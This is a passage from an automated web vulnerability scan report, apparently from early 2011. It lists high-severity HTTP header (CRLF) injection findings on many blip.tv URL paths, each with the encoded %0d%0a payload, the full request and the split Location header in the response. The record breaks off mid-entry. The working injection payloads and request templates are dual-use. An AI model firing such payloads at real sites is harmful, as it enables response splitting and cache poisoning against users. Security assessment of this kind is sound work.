2.222. http://blip.tv/play/hqkXgpzqKAI [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hqkXgpzqKAI

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 66c9d%0d%0a2e07d85723 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /66c9d%0d%0a2e07d85723/hqkXgpzqKAI HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/66c9d
2e07d85723
/hqkXgpzqKAI
Content-Type: text/html; charset=iso-8859-1
Content-Length: 289
Date: Thu, 20 Jan 2011 00:38:38 GMT
X-Varnish: 1025268406
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/66c9d
2e07d85723/hqkXgpzqKA
...[SNIP]...

2.223. http://blip.tv/play/hqkXgpzqKAI [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hqkXgpzqKAI

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 655a4%0d%0ac59653d05d0 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/655a4%0d%0ac59653d05d0 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/655a4
c59653d05d0

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:38 GMT
X-Varnish: 1498218407
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/655a4
c59653d05d0">her
...[SNIP]...

2.224. http://blip.tv/play/hqkXgpzqKAI.m4v/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hqkXgpzqKAI.m4v/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload f678a%0d%0a360b9d92f78 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /f678a%0d%0a360b9d92f78/hqkXgpzqKAI.m4v/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/f678a
360b9d92f78
/hqkXgpzqKAI.m4v/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 310
Date: Thu, 20 Jan 2011 00:38:38 GMT
X-Varnish: 1025268476
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/f678a
360b9d92f78/hqkXgpzqK
...[SNIP]...

2.225. http://blip.tv/play/hqkXgpzqKAI.m4v/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hqkXgpzqKAI.m4v/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload a85d0%0d%0add04bd7a515 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/a85d0%0d%0add04bd7a515/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/a85d0
dd04bd7a515
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:38:38 GMT
X-Varnish: 1498218472
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/a85d0
dd04bd7a515/">he
...[SNIP]...

2.226. http://blip.tv/play/hsYBgpzsBwI [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hsYBgpzsBwI

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload a5687%0d%0a4177d1e0688 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /a5687%0d%0a4177d1e0688/hsYBgpzsBwI HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/a5687
4177d1e0688
/hsYBgpzsBwI
Content-Type: text/html; charset=iso-8859-1
Content-Length: 290
Date: Thu, 20 Jan 2011 00:38:38 GMT
X-Varnish: 1324529026
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/a5687
4177d1e0688/hsYBgpzsB
...[SNIP]...

2.227. http://blip.tv/play/hsYBgpzsBwI [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hsYBgpzsBwI

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 2e593%0d%0afe762a762a0 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/2e593%0d%0afe762a762a0 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/2e593
fe762a762a0

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:39 GMT
X-Varnish: 1324529081
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/2e593
fe762a762a0">her
...[SNIP]...

2.228. http://blip.tv/play/hsYBgpzsBwI.m4v/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hsYBgpzsBwI.m4v/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1a9b0%0d%0ad91b20837c5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1a9b0%0d%0ad91b20837c5/hsYBgpzsBwI.m4v/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/1a9b0
d91b20837c5
/hsYBgpzsBwI.m4v/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 310
Date: Thu, 20 Jan 2011 00:38:38 GMT
X-Varnish: 1248906927
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/1a9b0
d91b20837c5/hsYBgpzsB
...[SNIP]...

2.229. http://blip.tv/play/hsYBgpzsBwI.m4v/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hsYBgpzsBwI.m4v/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 55bb5%0d%0aa6e4a855b11 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/55bb5%0d%0aa6e4a855b11/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/55bb5
a6e4a855b11
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:38:39 GMT
X-Varnish: 344228803
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/55bb5
a6e4a855b11/">he
...[SNIP]...

2.230. http://blip.tv/players/embed/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /players/embed/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ded4c%0d%0a9fb8644b8b9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ded4c%0d%0a9fb8644b8b9/embed/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/ded4c
9fb8644b8b9
/embed/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 285
Date: Thu, 20 Jan 2011 00:39:14 GMT
X-Varnish: 1274889385
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/ded4c
9fb8644b8b9/embed/">h
...[SNIP]...

2.231. http://blip.tv/players/embed/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /players/embed/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 8f32c%0d%0a2affe04b905 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /players/8f32c%0d%0a2affe04b905/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/players/8f32c
2affe04b905
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:39:15 GMT
X-Varnish: 1248913063
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/players/8f32c
2affe04b905/"
...[SNIP]...

2.232. http://blip.tv/popular [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /popular

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload e263b%0d%0a6c92da3739c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /e263b%0d%0a6c92da3739c HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/e263b
6c92da3739c

Content-Type: text/html; charset=iso-8859-1
Content-Length: 278
Date: Thu, 20 Jan 2011 00:38:54 GMT
X-Varnish: 1025271326
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/e263b
6c92da3739c">here</a>
...[SNIP]...

2.233. http://blip.tv/posts/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /posts/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload c2fc7%0d%0aa64f9f8f909 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /c2fc7%0d%0aa64f9f8f909/?bookmarked_by=hotepisodes&skin=json&callback=?&version=2 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/c2fc7
a64f9f8f909
/?bookmarked_by=hotepisodes&skin=json&callback=?&version=2
Content-Type: text/html; charset=iso-8859-1
Content-Length: 348
Date: Thu, 20 Jan 2011 00:39:15 GMT
X-Varnish: 2146053271
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/c2fc7
a64f9f8f909/?bookmark
...[SNIP]...

2.234. http://blip.tv/posts/report_inappropriate [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /posts/report_inappropriate

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload c847b%0d%0a9db90af76ad was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /c847b%0d%0a9db90af76ad/report_inappropriate HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/c847b
9db90af76ad
/report_inappropriate
Content-Type: text/html; charset=iso-8859-1
Content-Length: 299
Date: Thu, 20 Jan 2011 00:39:11 GMT
X-Varnish: 1274888956
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/c847b
9db90af76ad/report_in
...[SNIP]...

2.235. http://blip.tv/posts/report_inappropriate [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /posts/report_inappropriate

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 7e782%0d%0adfaef70a8a1 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /posts/7e782%0d%0adfaef70a8a1 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/posts/7e782
dfaef70a8a1

Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:39:12 GMT
X-Varnish: 1274888999
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/posts/7e782
dfaef70a8a1">he
...[SNIP]...

2.236. http://blip.tv/prefs/security/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /prefs/security/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9d984%0d%0adeedf2ae191 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9d984%0d%0adeedf2ae191/security/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/9d984
deedf2ae191
/security/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 303
Date: Thu, 20 Jan 2011 00:39:07 GMT
X-Varnish: 1324533869
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/9d984
deedf2ae191/security/
...[SNIP]...

2.237. http://blip.tv/prefs/security/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /prefs/security/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 548cc%0d%0a6fdc2af0610 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /prefs/548cc%0d%0a6fdc2af0610/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/prefs/548cc
6fdc2af0610
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 285
Date: Thu, 20 Jan 2011 00:39:08 GMT
X-Varnish: 1025273584
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/prefs/548cc
6fdc2af0610/">h
...[SNIP]...

2.238. http://blip.tv/random [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /random

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 778ef%0d%0a0ce99cdfdfd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /778ef%0d%0a0ce99cdfdfd HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/778ef
0ce99cdfdfd

Content-Type: text/html; charset=iso-8859-1
Content-Length: 293
Date: Thu, 20 Jan 2011 00:38:56 GMT
X-Varnish: 2146050195
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/778ef
0ce99cdfdfd">here</a>
...[SNIP]...

2.239. http://blip.tv/recent [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /recent

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 888f6%0d%0aa3fc8004d0a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /888f6%0d%0aa3fc8004d0a HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/888f6
a3fc8004d0a

Content-Type: text/html; charset=iso-8859-1
Content-Length: 278
Date: Thu, 20 Jan 2011 00:38:55 GMT
X-Varnish: 1324531933
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/888f6
a3fc8004d0a">here</a>
...[SNIP]...

2.240. http://blip.tv/report_form/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /report_form/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 92db0%0d%0aa554397957c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /92db0%0d%0aa554397957c/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/92db0
a554397957c
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 279
Date: Thu, 20 Jan 2011 00:39:11 GMT
X-Varnish: 1324534466
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/92db0
a554397957c/">here</a
...[SNIP]...

2.241. http://blip.tv/rss [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /rss

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ff801%0d%0a89d985fd93 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ff801%0d%0a89d985fd93 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/ff801
89d985fd93

Content-Type: text/html; charset=iso-8859-1
Content-Length: 277
Date: Thu, 20 Jan 2011 00:39:40 GMT
X-Varnish: 1324538033
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/ff801
89d985fd93">here</a>.
...[SNIP]...

2.242. http://blip.tv/rss/flash/4658178 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /rss/flash/4658178

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 59a80%0d%0a49d824c3177 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /59a80%0d%0a49d824c3177/flash/4658178 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/59a80
49d824c3177
/flash/4658178
Content-Type: text/html; charset=iso-8859-1
Content-Length: 292
Date: Thu, 20 Jan 2011 00:39:17 GMT
X-Varnish: 1498224698
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/59a80
49d824c3177/flash/465
...[SNIP]...

2.243. http://blip.tv/search [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /search

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 67fe1%0d%0a43cf9793345 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /67fe1%0d%0a43cf9793345 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/67fe1
